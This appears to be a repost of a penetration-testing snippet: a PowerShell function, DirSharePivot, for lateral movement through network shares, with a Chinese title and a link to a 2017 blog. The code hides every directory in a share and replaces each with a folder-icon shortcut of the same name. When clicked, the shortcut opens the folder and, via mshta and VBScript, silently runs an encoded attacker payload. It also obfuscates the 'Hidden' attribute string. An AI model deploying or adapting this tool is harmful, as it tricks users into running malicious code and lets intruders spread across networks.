利用网络共享进行横向移动
https://rewtin.blogspot.jp/2017/11/abusing-user-shares-for-efficient.html
function DirSharePivot
{
<#
.SYNOPSIS
Function: DirSharePivot
Author: David ROUTIN - 13 nov 2017
Example:
DirSharePivot -StartDir K:\test -Payload "powershell -enc XXXXXXXXXXXXXXXXXXXXXXXX"
This will set all the directories in the defined Path as Hidden (non recursive to keep control), after that a LNK file containing your payload will be created with the
name of each hidden directories.
This LNK will have a "directory shortcut icon", and will open a explorer to the selected directory when the user will click on it, and execute your defined payload
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$StartDir,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Payload
)
$Filepath = Get-ChildItem -path $StartDir -Force -directory
foreach ( $Object in $Filepath ) {
$Object.Attributes = (-join "uRtHoirdebn"[3,5,7,7,8,10])
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($StartDir + "\" + $Object + ".lnk")
$ShortCut.TargetPath="mshta.exe"
$ShortCut.Arguments= 'vbscript:Close(Execute("Set x = CreateObject(""WScript.shell""): x.Run ""cmd /c explorer.exe ' + $StartDir + "\" + $Object + " & " + $Payload + '"",vbhide "))'
$ShortCut.WindowStyle = 1;
$ShortCut.Hotkey = "CTRL+SHIFT+F";
$ShortCut.IconLocation = "C:\windows\System32\shell32.dll, 3";
$ShortCut.Description = $Object;
$ShortCut.Save()
}
}